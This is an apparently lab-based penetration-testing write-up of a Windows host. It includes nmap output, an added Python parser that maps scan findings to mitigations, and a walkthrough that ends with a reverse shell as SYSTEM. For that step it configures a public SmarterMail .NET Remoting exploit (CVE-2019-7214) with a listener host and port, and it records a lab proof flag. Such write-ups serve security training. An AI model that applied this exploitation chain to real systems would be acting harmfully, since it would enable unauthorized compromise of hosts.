Nmap Scan
# Nmap 7.92 scan initiated Sun Nov 7 23:34:29 2021 as: nmap -T4 -p- -A -oA scan-advanced 192.168.228.65
Nmap scan report for 192.168.228.65
Host is up (0.032s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
9998/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Mon, 08 Nov 2021 04:36:21 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
17001/tcp open remoting MS .NET Remoting services
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-08T04:36:26
|_ start_date: N/A
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 31.77 ms 192.168.49.1
2 31.82 ms 192.168.228.65
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 7 23:37:01 2021 -- 1 IP address (1 host up) scanned in 152.33 seconds
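The service enumeration that follows is done by reading the scan above by eye. As an added example (not part of the original writeup), the Python below parses nmap's normal-format output into per-port records plus host script lines and turns the weak settings the scan reports into findings with mitigations. The embedded text is an excerpt of the scan output above; the finding rules and mitigation wording are my own assumptions, not something nmap emits.

```python
import re
from dataclasses import dataclass, field

# Excerpt of the nmap normal-format output from the scan above, trimmed to the
# lines the parser needs (the page's own scan, not constructed data).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
9998/tcp open http Microsoft IIS httpd 10.0
17001/tcp open remoting MS .NET Remoting services
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
"""

# "21/tcp open ftp Microsoft ftpd" -> port, proto, state, service, version (rest of line)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines for this port


def parse_nmap(text):
    """Return (ports, host_script_lines) from nmap -oN style output."""
    ports, host_lines = [], []
    current = None
    in_host_scripts = False
    for line in text.splitlines():
        if line.startswith("Host script results"):
            in_host_scripts = True
            current = None
            continue
        m = PORT_RE.match(line)
        if m and not in_host_scripts:
            current = Port(int(m.group(1)), m.group(2), m.group(3),
                           m.group(4), m.group(5).strip())
            ports.append(current)
        elif line.startswith("|"):
            # Strip the "| " / "|_ " NSE prefix and keep the script text.
            body = line.lstrip("|_ ").strip()
            if in_host_scripts:
                host_lines.append(body)
            elif current is not None:
                current.scripts.append(body)
    return ports, host_lines


def findings(ports, host_lines):
    """Map NSE observations to (port, finding, mitigation). Rule set is assumed."""
    out = []
    for p in ports:
        text = " ".join(p.scripts)
        if "Anonymous FTP login allowed" in text:
            out.append((p.number, "anonymous FTP login allowed",
                        "disable anonymous authentication or limit it to read-only, non-sensitive content"))
        if "TRACE" in text:
            out.append((p.number, "HTTP TRACE enabled",
                        "disallow the TRACE verb (IIS request filtering)"))
        if p.service == "remoting":
            out.append((p.number, ".NET Remoting exposed",
                        "restrict the port to management hosts and keep the product patched"))
    if any("Message signing enabled but not required" in l for l in host_lines):
        out.append((445, "SMB signing not required",
                    "require SMB signing through policy"))
    return out


if __name__ == "__main__":
    ports, host_lines = parse_nmap(NMAP_OUTPUT)
    for port, issue, fix in findings(ports, host_lines):
        print(f"{port}/tcp: {issue} -> {fix}")
```

Running it over the excerpt yields four findings: anonymous FTP on 21, TRACE on 80, SMB signing not required on 445 and .NET Remoting on 17001, which is exactly the list the enumeration below works through.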
Service Enumeration
FTP
Looking at the nmap output, anonymous login appears to be enabled on this FTP server. I test the login and download all the files using mget *.
SMB
No anonymous share enumeration, access denied.
HTTP
Looks like a default installation of Microsoft IIS web server. I test for any files or directories using gobuster, but find nothing.
HTTP (TCP/9998)
Looks like an alternative web service called SmarterMail. I check Exploit DB for any vulnerabilities matching this service name using searchsploit. There appear to be some hits.
Default credentials found using Google search do not work here. Source code seems to reveal a version number.
.NET Remoting (TCP/17001)
Searching Google for information on this port, I see repeated mentions of remote code execution (RCE) coupled with SmarterMail.
- https://www.speedguide.net/port.php?port=17001
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7214
- Confirm on Exploit DB: https://www.exploit-db.com/exploits/49216
Exploit
Using the exploit found with searchsploit, I copy 49216.py to my current working directory and edit the exploit variables as follows:
HOST='192.168.228.65'
PORT=17001
LHOST='192.168.49.228'
LPORT=80
I then start a TCP listener on port 80 and run the exploit:
python3 49216.py
Post-Exploitation
The SmarterMail service is being executed by the SYSTEM account, meaning I have fully compromised this host.
Proofs
User: N/A
Root: db48a995f2fddde2cd9f58e3073343b7